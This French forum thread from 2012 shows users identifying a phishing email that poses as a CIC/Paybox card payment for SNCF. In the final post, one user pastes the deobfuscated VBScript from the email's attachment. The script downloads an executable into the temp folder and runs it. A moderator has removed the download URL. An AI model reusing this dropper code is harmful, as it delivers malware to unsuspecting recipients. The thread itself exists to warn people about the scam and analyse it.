djacques Posted January 13, 2012 Report Share Posted January 13, 2012 BONJOUR qui peu m'aider ,j'ai reçu ce mail Bonjour, Nous vous informons que votre carte bancaire a été acceptée. Le paiement concerne la société Voyage SNCF (Identifiant commerçant : 6302202). Référence de la transaction : 75559 Montant de la transaction : 40,06 EUR Date de la transaction : Le 10 Janvier 2012 à 10h53 (GMT) Numéro de la carte : 4972 04XX XXXX XXXX Numéro d'autorisation : 261637 Numéro de terminal : 6302202 Merci de contacter directement la société Voyage SNCF pour toute question relative à votre commande. Nous vous remercions pour votre confiance, L'Equipe CIC. mais bon ce n'est pas ma carte (ouf heureusement) et plus il y a un fichier joint que je n'ai pas ouvert biensur que pensez vous de ce mail en précisant que leur adresse mail est = commande @paybox.com que j'ai cherché sur le net sanns résultat merci d'avance pour votre aide Link to comment Share on other sites More sharing options...
Etat Major mickey19 Posted January 13, 2012 Etat Major Report Share Posted January 13, 2012 Bonjour, Quelqu'un qui s'est trompé d'adresse mail ? Cela ressemble à une confirmation de commande envoyée au mauvais destinataire... Link to comment Share on other sites More sharing options...
Mufecator Posted January 13, 2012 Report Share Posted January 13, 2012 (edited) Bonsoir, Non c'est un mail frauduleux à plein nez. Je suis un habitué des commandes de billets SNCF sur internet et leur mail de confirmation n'a rien à voir avec le vôtre. De plus, le mail expéditeur est bien d ela forme sncf quelque chose. Cordialement. Edited January 13, 2012 by Mufecator Link to comment Share on other sites More sharing options...
Etat Major mickey19 Posted January 13, 2012 Etat Major Report Share Posted January 13, 2012 Paybox est bien un organisme qui traite avec voyages SNCF Edit : Mais pourquoi "L'Equipe CIC" ? et aussi "VoyagE SNCF" sans "s" ... bref... la poubelle semble recommandée que ce soit une erreur ou un phishing Link to comment Share on other sites More sharing options...
djacques Posted January 14, 2012 Author Report Share Posted January 14, 2012 merci de vos réponses ce sont les deux que je doutais soit une erreur, soit un piège enfin je vais le détruire merci et bonne galette à vous :king: :king: Link to comment Share on other sites More sharing options...
justoli Posted January 15, 2012 Report Share Posted January 15, 2012 bonjour, j'ai reçu le même message, la date a été changée et la dernière ligne a été retirée : Bonjour, Nous vous informons que votre carte bancaire a été acceptée. Le paiement concerne la société Voyage SNCF (Identifiant commerçant : 6302202). Référence de la transaction : 75559 Montant de la transaction : 40,06 EUR Date de la transaction : Le 15 Janvier 2012 à 10h53 (GMT) Numéro de la carte : 5972 04XX XXXX XXXX Numéro d'autorisation : 261637 Numéro de terminal : 6302202 Merci de contacter directement la société Voyage SNCF pour toute question relative à votre commande. Nous vous remercions pour votre confiance, La pièce jointe intitulée "facture" est un script compressé au format .zip de 9.13 ko. Je l'ai analysée avec Avira mais pas de virus détecté, je l'ai ensuite jetée. Par securité je fais une analyse complète. J'hésite à aller vérifier mon compte (si c'est un keylogger) je le ferai surement d'un autre post demain. Ca semble en tout cas être plutôt une fraude qu'une erreur d'adresse... cordialement Link to comment Share on other sites More sharing options...
Etat Major mickey19 Posted January 15, 2012 Etat Major Report Share Posted January 15, 2012 Ca semble le confirmer en effet Il vaut mieux jeter la pièce jointe plutôt que tenter le diable (un malware peut ne pas être reconnu par les antivirus, il peut s'appuyer sur une faille zero-day etc... ) Link to comment Share on other sites More sharing options...
baldaquin Posted January 31, 2012 Report Share Posted January 31, 2012 (edited) Bonjour, j'ai reçu le même mail douteux suivant avec une pièce jointe. **************************************************************** Bonjour, Nous vous informons que votre carte bancaire a été acceptée. Le paiement concerne la société objetmania sarl (Identifiant commerçant : 6302202). Référence de la transaction : 75559 Montant de la transaction : 40,06 EUR Date de la transaction : Le 31 Janvier 2012 à 13h53 (GMT) E-Mail : xxxxxxxxxxxxx Numéro de la carte : 4972 XXXX XXXX XXXX Numéro d'autorisation : 261637 Numéro de terminal : 6302202 Merci de contacter directement la société objetmania sarl pour toute question relative à votre commande. Nous vous remercions pour votre confiance, L'Equipe CIC. **************************************************************** Après reconstitution du script en pièce jointe, je vous le livre. Si quelqu'un est assez bon pour dire ce qu'il fait exactement, car moi je n'y comprend rien, mais je me doute que ce doit être un spyware, un malware ou un virus. ************************************************************** Execute( Randomize nameLength = 15 randomname = "" Do While Len(randomname) < nameLength currRandCur = Int(Rnd * 255) If currRandCur >= Asc("a") And currRandCur <= Asc("z") _ Or currRandCur >= Asc("A") And currRandCur <= Asc("Z") _ Or currRandCur >= Asc("0") And currRandCur <= Asc("9") Then randomname = randomname & Chr(currRandCur) End If Loop strSource = ***************" strDest = WScript.CreateObject("Scripting.FileSystemObject").GetSpecialFolder(2) & "\" & randomname & ".exe" set HTTP = CreateObject("Microsoft.XMLHTTP") HTTP.open "GET", strSource, False HTTP.send set Stream = createobject("adodb.stream") Const adTypeBinary = 1 Const adSaveCreateNotExist = 1 Const adSaveCreateOverWrite = 2 Stream.type = adTypeBinary Stream.open Stream.write HTTP.responseBody Stream.savetofile strDest, adSaveCreateOverWrite set Stream = nothing set HTTP = nothing Set shell = CreateObject("WScript.Shell") shell.Run Chr(34) & strDest & Chr(34), 1, false Set shell = Nothing vbcrlf ) ********************************************************** Merci Edited January 31, 2012 by Cotdaz Lien supprimé.... Link to comment Share on other sites More sharing options...
Recommended Posts